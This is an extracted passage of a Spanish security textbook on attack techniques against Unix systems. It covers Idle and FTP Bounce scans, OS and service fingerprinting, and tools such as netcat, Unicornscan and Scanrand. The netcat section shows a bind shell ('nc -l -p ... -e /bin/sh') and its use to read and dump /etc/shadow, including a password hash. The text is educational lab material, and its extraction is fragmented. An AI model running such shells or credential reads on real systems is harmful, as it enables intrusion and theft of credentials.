Tiempo: 0.032604
Origen: 192.168.0.30:80 -> Destino: 192.168.0.2:54999
Protocolo: TCP
Descripcin: 80 > 54999 [RST, ACK] Seq=0 Ack=0 Win=0 Len=0
Paquete Nro: 7
Tiempo: 0.032667
Origen: 192.168.0.2:54999 -> Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 54999 > 22 [] Seq=0 Len=0
Paquete Nro: 8
Tiempo: 1.147994
Origen: 192.168.0.2:55000 -> Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 55000 > 22 [] Seq=0 Len=0
4.3.7. IdleScan
El Idle Scan puede decirse que es bastante diferente a los anteriores, dado
que el port scanner no utiliza nicamente el host donde se est ejecutando para
enviar paquetes directamente al destino, sino que se aprovecha de la existencia
otro host intermedio (zombie), que debe estar inactivo en cuanto a
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 51 de 210
1. A comprueba:
a) La predictibilidad en la generacin del campo ID de IP81 de B (IP-ID
de ahora en ms). Es decir, el port scanner en A chequea que B utilice
algn algoritmo predecible (normalmente nmeros secuenciales) para
identificar (o marcar) los paquetes IP. Esto lo hace envindole varios
paquetes SYN+ACK para obtener RSTs y chequear que los IP-ID de
las respuestas son efectivamente sucesivos (o predecibles al menos82).
Este proceso puede llamrselo como pregunta nmero de IP-ID de
B.
b) Al enviarle dichos paquetes SYN+ACK y recibir los respectivos RST
desde B, A tambin verifica que B est sin trfico, ya que de otra
manera, los IP-IDs no seran secuenciales.
2. Si B pasa las pruebas que hace A, entonces B es adecuado para utilizar
como Zombie y se guarda el ltimo IP-ID recibido.
3. El port scanner en A le enva directamente a C paquetes SYN haciendo
Spoofing de la IP83 de B. Dichos paquetes enviados son, en realidad, el
escaneo de puertos real (es un Syn Scan normal, van dirigidos a los
puertos que a A le interesa saber su estado); la diferencia se encuentra en
que A sabe que al haber hecho spoofing de la IP de B, las respuestas de C
no sern devueltas a A, sino que irn destinadas a B (paso 4).
4. C, al recibir un paquete con SYN desde B (aunque en realidad sea A), va
comportarse como un receptor clsico de un SYN Scan: si el puerto
80 De aqu proviene el nombre de Idle Scan, es decir, idle significa inactivo en ingls.
81 El Campo ID del encabezado IP es utilizado para fragmentar los datagramas en algn punto de
la comunicacin y reensamblarlos en otro. Se utilizan nmeros secuenciales para relacionar un
nico segmento de Capa 4 en varios datagramas IP de Capa 3. Ver [TCP/IP_Ill], Cap. 11.5.
82 Para ms informacin sobre el algoritmo que utiliza Nmap para averiguar si el IP-ID es
predecible, ver: http://nmap.org/osdetect/osdetect-methods.html#osdetect-ti
83 Para hcer spoofing de una IP, Nmap modifica el campo correspondiente a la direccin IP de
Origen del encabezado de los paquetes que enva. Ver [IP_SPOOF].
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 52 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 54 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 55 de 210
Captura 10: Ejecucin del Idle Scan en s, dado que el puerto 25 est abierto
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 56 de 210
scanner), y ste marca el puerto como abierto. En caso contrario el servidor FTP
tambin lo informa (con un error) que el port scanner reconoce, viendo el puerto
del destino como cerrado.
Dado un esquema similar al Idle Scan anterior (donde A es el host que
ejecuta el port scanner, B es el Servidor FTP y C el equipo objetivo), la secuencia
de ataque tpica es:
1. El port scanner en A se conecta al FTP Server en B.
2. A le enva un comando PORT a B de manera que se conecte a C.
3. Si el FTP en B permite la ejecucin del comando PORT con los
parmetros que se le pasaron, devuelve un mensaje de OK.
4. Llegado este punto, el port scanner usualmente pide la ejecucin del
comando ms comn del protocolo FTP: LIST; esto es slo para que el
servidor FTP en B efectivamente se conecte al objetivo C e intente enviar
un listado de archivos del directorio (B supone que en esa IP y puerto hay
otro FTP Server).
5. Si B tiene xito en la conexin (hubo un three-way handshake entre B y
C), enva por el canal FTP establecido previamente un mensaje de OK que
A identifica88 y le permite marcar el puerto como abierto.
6. Si B no tiene xito en la conexin (al SYN de B le sigui un RST+ACK de
C o un timeout porque el puerto est filtrado), B enva un mensaje de error
por la conexin FTP entre A y B, y el port scanner marca el puerto como
cerrado.
88 En el protocolo FTP, al igual que en el protocolo HTTP, a un comando del cliente le sigue una
respuesta del servidor; dichas respuestas estn definidas en los RFC y estn precedidas por un
cdigo de mensaje (un nmero), adems del mensaje en formato texto (ya que en los inicios de
internet un cliente poda ser un usuario humano). Los cdigos mayores a 200 son de OK, los
mayores a 400 son de Error y as sucesivamente. Ver [WIKI_FTPC].
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 59 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 60 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 61 de 210
Captura 13: Captura de trfico del momento donde el FTP Server B chequea (en nombre de A)
el estado de los puertos 22 -cerrado- primero y 80 luego -abierto- en C.
Captura 14: Sesin de ataque de un servidor VSFTPD configurado para ser vulnerable
Consola 8: FTP Bounce Scan a un servidor VSFTPD y un Syn Scan como prueba del error
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 63 de 210
hoy en da que un escaneo de puertos con este mtodo sea efectivo y confiable.
Tipo/Caract.
Syn Scan
Media
Medio
Alta
Objetivo
Puertos Abiertos ,
Cerrados y Filtrados
Connect Scan
No
Baja
Muy
Alta
Bajo
Puertos Abiertos ,
Cerrados y Filtrados
Ack Scan
Si
Media
Alto
Media
Puertos Filtrados
Window Scan
Si
Media
Alto
Baja
Puertos Filtrados +
Abiertos/Cerrados
UDP Scan
Si
Alta
Medio/
Bajo
Media
M/Null/Fin/Xmas
Si
Media
Alto
Media
Idle Scan
Si
Muy
Baja
Muy Alto
Alta
Puertos Abiertos,
Muy
Baja
FTP Bounce
IP Scan
No
Si
Baja
Cerrados y Filtrados
Puertos Abiertos,
Cerrados/Filtrados
Bajo
Media
Detectar protocolos
activos de Capa 4
Consola 11: Firma de OpenBSD 4.2 almacenada en el formato de NMap 2da generacin
[NMAP_OS2])
probes dentro de un Test. Todos estos probes compuestos por sus parmetros
calculados conforman la huella dactilar de un SO y son los que efectivamente se
vuelcan en un archivo de fingerprint.
Nmap, como la mayora de este tipo de herramientas, fomentan la
participacin de los usuarios imprimiendo por pantalla un fingerprint que no
exista en la base de firmas, con la intencin de que el mismo sea reportado al
proyecto junto con la identificacin de a qu SO pertenece.
96 Para ms informacin sobre la primera generacin del motor, que an sigue siendo til, ver
[NMAP_OS1] y [HACK_EXP], Cap. 2.
97 Ver http://insecure.org/stf/Nmap-4.50-Release.html
98 Para mayor informacin de los cambios entre las diferentes versiones de Nmap, ver el siguiente
enlace: http://nmap.org/changelog.html
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 68 de 210
Parmetros Obtenidos:
a) Obtencin de Mximo Comn Denominador en los Nmeros de
Secuencia TCP Iniciales (o ISNs)100 (GCD).
b) Clculo de la Media del aumento de los Nmeros de Secuencia TCP
Inicial obtenidos (ISR).
c) Indice de predictibilidad de la secuencia de ISNs obtenida (SP). Es la
varianza de lo anterior. Estima la dificultad de predecir el siguiente
ISN de una secuencia conocida de 6 ISNs.
d) Evaluacin del algoritmo de generacin de Secuencias IP-ID para
paquetes TCP e ICMP (TI, II).
e) Booleano de Secuencia IP ID Compartida (SS). Si el destino comparte
la secuencia IP-ID entre los protocolos TCP e ICMP, este campo se
establece en S, que proviene de Shared, o Compartida.
f) Opciones de TCP (O o O1-O6). Nmap enva en los probes de este test
algunas opciones de TCP y aqu se almacenan las respuestas obtenidas.
g) Tamao de Ventana TCP Inicial (W o W1-W6). Slo se almacena el
tamao de ventana del paquete recibido por cada probe.
h) Respuesta (R): Si el host respondi; slo se almacena un Y o N.
i) Bits IP de No Fragmentacin en paquetes TCP e ICMP (DF, DFI). Se
almacena si los paquetes recibidos contenan el bit en cuestin
activado o no.
j) Valor TTL Inicial del campo IP (T) y su valor original estimado (TG).
Se almacena el TTL de las respuestas recibidas (todas son iniciales,
99 Entre parntesis al final de cada tem se encuentran los cdigos que el autor de Nmap le asign
dentro del documento al que se hace referencia ([NMAP_OS2]).
100 El Nmero de Secuencia TCP Inicial o ISN es el valor del campo TCP-Nmero de Secuencia
del primer paquete SYN+ACK que devuelve el host destino a un SYN enviado por Nmap a un
puerto abierto.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 69 de 210
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 71 de 210
Consola 12: Deteccin de Sistema Operativo con NMap Coincidencia de firma perfecta
Encabezado IP:
Bit de No Fragmentacin IP
Encabezado TCP:
informacin que el listado de arriba, como se puede ver en la Consola Nro 13. All
lo que se puede ver es la base de firmas SYN, que es la modalidad tradicional y la
que mejores resultados brinda. La desventaja de esto es que hay que lograr de
alguna manera que el objetivo inicie conexiones con el equipo que est ejecutando
p0f, lo cual segn las circunstancias, puede ser muy difcil.
marcelo@saturno:~$ sudo cat /etc/p0f/p0f.fp
# Fingerprint entry format:
#
# wwww:ttt:D:ss:OOO...:QQ:OS:Details
#
# wwww
- window size (can be * or %nnn or Sxx or Txx)
#
"Snn" (multiple of MSS) and "Tnn" (multiple of MTU) are allowed.
# ttt
- initial TTL
# D
- don't fragment bit (0 - not set, 1 - set)
# ss
- overall SYN packet size (* has a special meaning)
# OOO
- option value and order specification (variable-see below)
# QQ
- quirks list (variable-see below)
# OS
- OS genre (Linux, Solaris, Windows)
# details - OS description (2.0.27 on x86, etc)
[...]
----------------- Linux ------------------[...]
S4:64:1:60:M*,S,T,N,W5:.:Linux:2.6 (newer, 1)
S4:64:1:60:M*,S,T,N,W6:.:Linux:2.6 (newer, 2)
S4:64:1:60:M*,S,T,N,W7:.:Linux:2.6 (newer, 3)
T4:64:1:60:M*,S,T,N,W7:.:Linux:2.6 (newer, 4)
[...]
----------------- Solaris ----------------[...]
S34:64:1:52:M*,N,W0,N,N,S:.:Solaris:10 (beta)
32850:64:1:64:M*,N,N,T,N,W1,N,N,S:.:Solaris:10 (1203?)
32850:64:1:64:M*,N,W1,N,N,T,N,N,S:.:Solaris:9.1
Las nicas diferencias apreciables son que la versin real de OpenBSD era
la 4.2 en vez de 3.9, y que la conexin de un FreeBSD 7.0 no fue identificada.
Para ningn cliente hubo actividad sospechosa o diferente a la normal.
Devuelve resultados
111 Para ms documentacin (papers, presentaciones, etc.) sobre Fingerprinting Difuso, visitar el
siguiente enlace: http://sys-security.com/blog/published-materials/
112 RING: Acrnimo de Remote Identification, Next Generation Identificacin Remota, Nueva
Generacin.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 76 de 210
como alternativa.
115 La mayora de las relaciones Nmero de Puerto => Servicio los asigna el IANA (Internet
Assigned Numbers Authority); stas se consideran semi-estndares (ya que son una
recomendacin a seguir, no una obligacin), definida por un importante ente de Internet, que
controla los DNSs raz y las IPs asignadas, por ejemplo. Para ver un listado de los puertos y
servicios reconocidos por el IANA, ver este enlace: http://www.iana.org/assignments/portnumbers. Sin embargo, esto no impide que se pueda hacer caso omiso de esta recomendacin.
Por otro lado, existen servicios no enumerados en el listado y que sin embargo se conoce qu
puerto utilizan (aun producindose colisiones de nmeros de puerto en algunos casos). Ms
informacin: http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 79 de 210
5.2.2.1. Amap
Amap posee dos archivos de firmas; uno de triggers (o disparadores)
llamado appdefs.trig y otro de respuestas conocidas nombrado como
appdefs.resp. El primero corresponde a secuencias de bytes o strings (cadenas
de texto) a enviar apenas se establece una conexin (en el caso de TCP). El
segundo pertenece a las respuestas de aplicaciones conocidas, y pueden estar
relacionadas a un trigger o no, ya que hay servicios/protocolos en donde el
servidor enva un string o un conjunto de bytes al cliente en primera instancia. Es
decir, una respuesta puede ser generada por un estmulo en la conexin apenas
iniciada (el trigger) o recibida inmediatamente sin enviar nada.
En la Consola 16 se muestra el formato de archivo de triggers de Amap
junto con algunos ejemplos. Los primeros tres muestran triggers de los servicios
quizs ms comunes, como son HTTP, SMTP y FTP y se encuentran en formato
ascii (texto plano). Para los tres ltimos (DNS genrico en puertos TCP/UDP y
DNS Bind118) es necesario un trigger binario. Con la utilizacin de triggers
binarios, ya puede apreciarse la ventaja de usar este tipo de herramientas a
comparacin de telnet o netcat a mano.
#
#
#
#
#
#
#
#
#
#
#
#
#
Consola 16: Formato del archivo de Triggers de Amap (traducido del ingls)
# This is the responses file "appdefs.resp" for amap
#
# Las Respuestas tienen el siguiente formato:
#
# NAME:[TRIGGER,[TRIGGER,...]]:[IP_PROTOCOL]:
[MIN_LENGTH,MAX_LENGTH]:RESPONSE_REGEX
#
# NAME El nombre que imprime amap si la definicin coincide
con la respuesta recibida del servicio
# TRIGGER (opcional) Requiere que los datos recibidos hayan sido
la respuesta de un trigger con este nombre en
#
appdefs.trig. Puede separar varios con una coma.
# IP_PROTOCOL (opcional) Requiere que la respuesta recibida venga va
#
el protocolo tcp o udp. Por defecto son ambos. [...]
# LENGTH (opcional) El mnimo y mximo largo de la respuesta
recibida, separado por una coma o un nico nmero [...]
# RESPONSE Esta es una expresin regular de Perl (man perlre) que
ser evaluada en los datos recibidos
# Ejemplos:
[...]
dns-bind9:dns-bind:udp::^...[\x00-\x7e]..........................\xc0
dns-bind8:dns-bind:udp::^...[\x00-\x7e]..........................
[^\xc0]
dns-djb:dns-bind:udp::^...[\x80-\x83].*version.bind
[...]
http-apache-1::tcp::^HTTP/.*\nServer: Apache/1
http-apache-2::tcp::^HTTP/.*\nServer: Apache/2
[...]
tftp::udp::^\x00[\x03\x05]\x00
Consola 17: Formato del archivo de Respuestas de Amap (traducido del ingls)
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 81 de 210
por la base de firmas, como por ejemplo las relacionadas con los triggers de DNS
vistos previamente, unas respuestas que tpicamente el servidor web Apache
devuelve a los clientes (no relacionado con ningn trigger), y una respuesta a un
paquete UDP enviado a un servidor TFTP. Este archivo de respuestas conocidas
razonablemente excede la cantidad de triggers conocidos, ya que varias respuestas
pueden estar asociadas a un trigger o a ninguno; lo ideal sera que cada respuesta
identifique una o varias versiones de iguales o diferentes servidores.
El funcionamiento de Amap es sencillo, y se puede resumir en los siguientes
pasos [SANS_AMAP]:
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 82 de 210
5.2.2.2. Nmap
Nmap en este aspecto no difiere demasiado en su comportamiento con el
Amap, salvo que su base de firmas es nica y est ms actualizada (ya que la
comunidad que lo rodea es mayor) y sus capacidades y posibilidades son mayores,
an a costa de mayor complejidad. Tambin cumple un mejor papel teniendo en
cuenta el objetivo de pasar desapercibido y brindar ms informacin y flexibilidad
a sus usuarios.
A lo largo de su ejecucin realiza un escaneo de puertos estndar (tal como
fue descripto en el captulo anterior) y, quedndose con los puertos abiertos,
detecta los servicios de esta manera [NMAP_VSCAN]:
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 83 de 210
Probe:
Sintaxis: Probe
match:
Sintaxis: match <nombre_servicio>|<patrn>|[informacin de versin]
El patrn de coincidencia consiste en una expresin regular, en formato
La informacin de versin puede utilizar
las coincidencias de la expresin regular (mediante las variables $1, $2,
Perl:
m/[expresin]/[opciones].
121 Todos los probes poseen un valor de rarity, que en un escaneo se lo configura con el
parmetro version-intensity, y va del 0 al 9. Establecerlo en 0 resulta menos que un Banner
Grabbing, ya que slo lo posee el Null Probe. Si se establece el intensity/rarity en 9, Nmap
puede tardar mucho ms, pero ser capaz de detectar servicios muy poco frecuentes en puertos
muy poco frecuentes tambin. La intensidad por defecto es de 7.
122 Para otras directivas, como rarity, ports, softmatch, fallback, etc., referirse a la documentacin
(aunque se deducen de los explicado aqu): http://nmap.org/vscan/
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 85 de 210
Null Probe + Opciones del Probe Conjunto match del Null Probe.
Probe A + Opciones del Probe Conjunto match del Probe A
[...]
El primer probe del archivo es el Null, seguido por unos cuantos match con
Banners de los servicios de FTP, SSH, SMTP y VNC. En el segundo Probe se
aprecian las directivas de nivel de rarity y de puertos tpicos donde el GetRequest
tiene mayor probabilidad de coincidencia, junto con un match especfico para el
Servidor Web Cherokee.
# Nmap service detection probe list -*- mode: fundamental; -*# $Id: nmap-service-probes 6880 2008-03-08 05:40:13Z doug $
[...]
# This is the NULL probe that just compares any banners given to us
Probe TCP NULL q||
# Wait for at least 6 seconds for data. It used to be 5, but some
# smtp services have lately been instituting an artificial pause (see
# FEATURE('greet_pause') in Sendmail, for example)
totalwaitms 6000
[...]
match ftp m/^220[- ].*FTP server \(Version (wu-[-.\w]+)/s p/WU-FTPD/ v/
$1/ o/Unix/
[...]
match ssh m|^SSH-([\d.]+)-OpenSSH_([\w.]+) FreeBSD-([\d]+)\n|
p/OpenSSH/ v/$2/ i/FreeBSD $3; protocol $1/ o/FreeBSD/
[...]
match smtp m|^220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n|
p/Postfix smtpd/ h/$1/ o/Linux/ i/Debian/
[...]
match vnc m|^RFB 003\.00(\d)\n$| p/VNC/ i/protocol 3.$1/
[...]
Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n|
rarity 1
ports 1,70,79,8085,88,113,139,143,280,497,505,514,515,540,554,591,631[...]
sslports 443
[...]
match http m|^HTTP/1\.0 \d\d\d .*\r\nServer: Cherokee/(\d[-.\w]+)\r\n|s
p/Cherokee httpd/ v/$1/
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 86 de 210
IDSs/IPSs, etc.
Aprovechar las debilidades del objetivo.
6.1. Netcat
Netcat123 es quiz la herramienta ms verstil y popular que existe para
hackear en la red; tanto es as que se lo suele conocer como la navaja suiza
multiuso. La versin original (que data de 1996) fue posteriormente mejorada y
adaptada por varios desarrolladores y proyectos, por lo que sus derivados pueden
encontrarse bajo el nombre de nc, ncat, pnetcat, socat, sock, socket y sbd
adems del GNU netcat124; todas son versiones que se encuentran
ampliamente disponibles en la mayora de los Sistemas Operativos tipo Unix.
[WIKI_NC],
Captulo 6. - 6.1.Netcat
Captulo 6. - 6.1.Netcat
Consola 20: Netcat como cliente de aplicaciones de red, en este caso HTTP y POP3
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 89 de 210
Captulo 6. - 6.1.Netcat
(Servidor)
-e
root@ubuntu-server:~$
/bin/sh; done
while [[ ! -e /tmp/.cerrar
]];do nc -l -p 15679
(Cliente)
marcelo@saturno:~$ nc 192.168.0.60 15679
ls -l
total 104
drwxr-x--- 3 marcelo marcelo 4096 2007-01-27 16:56
completo_grafico.html
-rw-r--r-- 1 marcelo marcelo 42482 2007-01-27 16:56 completo.html
-rw------- 1 marcelo marcelo 20080 2007-01-27 16:56 completo.nbe
-rw-r--r-- 1 marcelo marcelo 11818 2007-01-27 15:17 defaultfullplugins.html
-rw-r--r-- 1 marcelo marcelo 13014 2007-01-27 14:38 default.html
drwxr-xr-x 2 marcelo marcelo 4096 2007-01-27 16:32 exploits
drwxr-xr-x 2 marcelo marcelo 4096 2007-01-27 13:05 tools
pwd
/home/marcelo
hostname
ubuntu-server
uname -a
Linux ubuntu-server 2.6.15-51-server #1 SMP Tue Feb 12 17:12:18 UTC
2008 i686 GNU/Linux
(Ctrl+C)
marcelo@saturno:~$ nc 192.168.0.60 15679 > server_shadow
cat /etc/shadow
touch /tmp/.cerrar
(Ctrl+C)
marcelo@saturno:~$ nc 192.168.0.60 15679
(UNKNOWN) [192.168.0.60] 15679 (?) : Connection refused
marcelo@saturno:~$ cat server_shadow
root:*:13526:0:99999:7:::
daemon:*:13526:0:99999:7:::
bin:*:13526:0:99999:7:::
sys:*:13526:0:99999:7:::
sync:*:13526:0:99999:7:::
games:*:13526:0:99999:7:::
man:*:13526:0:99999:7:::
lp:*:13526:0:99999:7:::
mail:*:13526:0:99999:7:::
news:*:13526:0:99999:7:::
uucp:*:13526:0:99999:7:::
proxy:*:13526:0:99999:7:::
www-data:*:13526:0:99999:7:::
backup:*:13526:0:99999:7:::
list:*:13526:0:99999:7:::
irc:*:13526:0:99999:7:::
gnats:*:13526:0:99999:7:::
nobody:*:13526:0:99999:7:::
dhcp:!:13526:0:99999:7:::
syslog:!:13526:0:99999:7:::
klog:!:13526:0:99999:7:::
marcelo:$1$t03HQAhF$/CP/w2tw5Rn1DXrJP0eF21:13540:0:99999:7:::
sshd:!:13540:0:99999:7:::
ftp:!:13944:0:99999:7:::
marcelo@saturno:~$
Consola 21: Consola Remota va Netcat. En negrita estn los comandos tipeados por el cliente
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 90 de 210
Captulo 6. - 6.1.Netcat
Captulo 6. - 6.1.Netcat
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 92 de 210
Lo interesante es que como se detall en el Idle Scan (pgina 51), todo host
que recibe un SYN+ACK devuelve un RST al origen. Nmap, an cuando el
SYN+ACK le es til y suficiente para determinar que el puerto est abierto,
simula el comportamiento que adopta el resto de los hosts cuyas IPs fueron
falsificadas (paquetes 23 y 29), es decir, enva un RST tambin. Como principal
desventaja al habilitar esta opcin en un portscan se puede mencionar la lentitud
que conlleva.
En negrita se indican algunos puntos interesantes de la captura, como el
spoofing y las peticiones ARP contestadas por el host original.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 93 de 210
[...]
Paquete Nro: 3 - Tiempo: 0.069578
Mac Origen: 00:17:31:96:5b:1f (A) -> Mac Destino: 00:0c:29:e1:a2:26 (D)
IP Origen: 192.168.0.100:42855 -> IP Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 42855 > 22 [SYN] Seq=0 Len=0 MSS=1460
Paquete Nro: 4 - Tiempo: 0.075830
Mac Origen: 00:0c:29:e1:a2:26 (D) -> Mac Destino: ff:ff:ff:ff:ff:ff
IP Origen: 00:0c:29:e1:a2:26 (D) -> IP Destino: ff:ff:ff:ff:ff:ff:
Protocolo: ARP
Descripcin: Who has 192.168.0.100? Tell 192.168.0.30
[...]
Paquete Nro: 6 - Tiempo: 0.077145
Mac Origen: 00:0c:29:90:2a:2d (B) -> Mac Destino: 00:0c:29:e1:a2:26 (D)
IP Origen: 00:0c:29:90:2a:2d (B) -> IP Destino: 00:0c:29:e1:a2:26 (D)
Protocolo: ARP
Descripcin: 192.168.0.100 is at 00:0c:29:90:2a:2d (B)
[...]
Paquete Nro: 8 - Tiempo: 0.078565
Mac Origen: 00:0c:29:e1:a2:26 (D) -> Mac Destino: 00:0c:29:90:2a:2d (B)
IP Origen: 192.168.0.30:22 -> IP Destino: 192.168.0.100:42855
Protocolo: TCP
Descripcin: 22 > 42855 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460
[...]
Paquete Nro: 10 - Tiempo: 0.080503
Mac Origen: 00:0c:29:90:2a:2d (B) -> Mac Destino: 00:0c:29:e1:a2:26 (D)
IP Origen: 192.168.0.100:42855 -> IP Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 42855 > 22 [RST] Seq=1 Len=0
[...]
Paquete Nro: 21 - Tiempo: 0.087726
Mac Origen: 00:17:31:96:5b:1f (A) -> Mac Destino: 00:0c:29:e1:a2:26 (D)
IP Origen: 192.168.0.2:42855 -> IP Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 42855 > 22 [SYN] Seq=0 Len=0 MSS=1460
Paquete Nro: 22 - Tiempo: 0.088046
Mac Origen: 00:0c:29:e1:a2:26 (D) -> Mac Destino: 00:17:31:96:5b:1f (A)
IP Origen: 192.168.0.30:22 -> IP Destino: 192.168.0.2:42855
Protocolo: TCP
Descripcin: 22 > 42855 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460
Paquete Nro: 23 - Tiempo: 0.088068
Mac Origen: 00:17:31:96:5b:1f (A) -> Mac Destino: 00:0c:29:e1:a2:26 (D)
IP Origen: 192.168.0.2:42855 -> IP Destino: 192.168.0.30:22
Protocolo: TCP
Descripcin: 42855 > 22 [RST] Seq=1 Len=0
[...]
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 96 de 210
esta
vulnerabilidad.
Lo
mismo
sucede
con
Por host: Son ejecutados por host a escanear, ya que pueden estar
asociados a tareas con el nombre de dominio, situacin dentro de la Red
destino y su firewall, IP, etc.
id="Anonymous FTP"
description="Checks to see if a FTP server allows anonymous logins"
author = "Eddie Bell <ejlbell@gmail.com>"
license = "See nmaps COPYING for licence"
categories = {"intrusive"}
require "shortport"
portrule = shortport.port_or_service(21, "ftp")
action = function(host, port)
local socket = nmap.new_socket()
local result
local status = true
local isAnon = false
local err_catch = function()
socket:close()
end
local try = nmap.new_try(err_catch())
socket:set_timeout(5000)
try(socket:connect(host.ip, port.number, port.protocol))
try(socket:send("USER anonymous\r\n"))
try(socket:send("PASS IEUser@\r\n"))
while status do
status, result = socket:receive_lines(1);
if string.match(result, "^230") then
isAnon = true
break
end
end
socket:close()
if(isAnon) then
return "FTP: Anonymous login allowed"
end
end
Consola 25: Fuente del Script para NSE que detecta si un Servidor FTP acepta login annimo
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 99 de 210
Captulo 6. - 6.3.Unicornscan
6.3. Unicornscan
Los desarrolladores de Unicornscan lo definen como un framework135
distribuido de Estmulo/Respuesta utilizando como medio la red, por lo que no
slo es un port scanner. Se distribuye bajo la licencia GPL v2, y su objetivo es
implementar un stack TCP/IP distribuido en modo usuario136. Est diseado para
ser escalable, preciso, flexible y eficiente137, que no es lo mismo que solamente
ser rpido.
Algunas de sus caractersticas ms importantes son:
Escaneo TCP asincrnico sin estado, con todas las combinaciones de
banderas TCP.
Banner Grabbing TCP asincrnico, sin estado.
Captulo 6. - 6.3.Unicornscan
140 Cluster: Conjunto de computadoras que trabajan en grupo y actan como un nodo nico e
indivisible, en pos de lograr un objetivo sumando el recurso de cada uno de sus componentes.
Ver: http://en.wikipedia.org/wiki/Computer_cluster
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 101 de 210
Captulo 6. - 6.3.Unicornscan
6.4. Scanrand
Este portscanner est includo en una suite de herramientas de seguridad
llamada Paketto Keiretsu141, desarrollada por Dan Kaminsky. Tiene como
primer y ms importante objetivo hacer su trabajo lo ms rpido posible;
adems, posee un diseo parecido al de Unicornscan (aunque ste es posterior).
La diferencia principal reside en que Scanrand no posee un proceso de control
maestro (no lo necesita, ya que slo es un Port Scanner), y no crea N procesos
enviadores o senders.
En su meta de alcanzar el mximo rendimiento en un escaneo, esta
herramienta innov en algunos aspectos. Por ejemplo, al implementar un proceso
que slo enve mensajes y otro que slo los reciba sin comunicarse entre s; y
tambin al implementar y mejorar, en un proceso de espacio del usuario, parte de
la mquina finita de estados de TCP142.
Para esto su autor, Dan Kaminksy, desarroll la tcnica del Inverted SYN
Cookie, o SYN Cookie Inverso, que intenta aplicar la tcnica de las SYN
Cookies143 pero del lado del cliente (quien realiza el portscan).
A grandes rasgos [SANS_SCANRAND], Scanrand funciona de la siguiente
manera:
I. Crea un proceso enviador (sender) y el proceso principal se convierte en
recibidor o escuchador (listener o receiver). Genera un nmero
clave o semilla (seed), aleatorio por defecto, que se utilizar en toda la
141 URL: http://www.doxpara.com/
142 Para ver la FSM (Finite State Machine Mquina de Estados Finitos) de TCP, ir al Anexo A.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 102 de 210
Captulo 6. - 6.4.Scanrand
143 La tcnica de las SYN Cookies fue desarrollada en 1996 como respuesta a los ataques de
inundacin de SYNs (SYN floods). Consiste en que el SO, teniendo procesos en modo
LISTEN, no reserve recursos propios cuando recibe un SYN, sino descartarlo, y devolver el
SYN+ACK al cliente con una firma unvoca en el nmero de secuencia inicial TCP. Dicha
firma es el resultado de cierta informacin del SYN original, aplicada a una funcin de
dispersin (hash). Al recibir el ACK correspondiente, el SO puede identificar si corresponde a
una conexin vlida o no, verificando una posible firma en el campo Nmero de ACK TCP.
Ver: http://en.wikipedia.org/wiki/Syn_cookies, http://en.wikipedia.org/wiki/SYN_flood
144 Para ver qu es un ISN, ir a la pgina 69.
145 En dicha frmula, el smbolo + significa concatenacin. Scanrand la trunca a 32 bits
(HMAC-SHA-1 genera un hash de 160 bits) para que pueda ser almacenada en el campo SEQ
del encabezado TCP. Hay que tener en cuenta esto reduce la efectividad del algoritmo SHA-1.
146 Para ms informacin sobre HMAC, ver: http://en.wikipedia.org/wiki/Hmac
147 Ver Glosario: Hash, pg. 193.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 103 de 210
Captulo 6. - 6.4.Scanrand
(HMAC-SHA-1
((IPOrig+IPDest+PtoOrig+PtoDest),
Clave),
32bits)
Captulo 6. - 6.4.Scanrand
paquetes que provienen ms tarde, segn la cantidad de tiempo que se espera por
una respuesta.
En conclusin, el proceso de escaneo de puertos de Scanrand es asincrnico,
escalable y mucho ms rpido que un escaneo secuencial (puerto por puerto y host
por host). La desventaja que tiene es que es poco probable que pase desapercibido
para los IDSs o herramientas de monitoreo, aunque est bien claro que no es la
intencin de Scanrand evitarlas; adems, hay que tener en cuenta que en este caso
la velocidad va en desmedro de la precisin. Es por esto que Scanrand puede ser
muy til para redes locales grandes y rpidas, con buen ancho de banda y baja
latencia, o donde no importe pasar desapercibido para el administrador.
Traceroute bajo todos los protocolos soportados (no slo UDP). Es decir,
